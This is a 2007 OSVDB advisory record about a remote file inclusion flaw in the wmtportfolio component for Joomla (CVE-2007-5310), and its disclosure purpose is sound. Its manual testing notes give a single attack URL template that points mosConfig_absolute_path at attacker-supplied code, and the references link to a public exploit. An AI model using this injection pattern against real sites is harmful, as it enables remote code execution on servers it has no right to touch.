wmtportfolio Component for Joomla! admin.wmtportfolio.php mosConfig_absolute_path Variable Remote File Inclusion

2007-10-07T00:00:00
ID OSVDB:38644
Type osvdb
Reporter OSVDB
Modified 2007-10-07T00:00:00

Description

Manual Testing Notes

http://[target]/path/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=[evilcode]

References:

Keyword: com_wmtportfolio ISS X-Force ID: 36993 Generic Exploit URL: http://www.milw0rm.com/exploits/4497 CVE-2007-5310 Bugtraq ID: 25959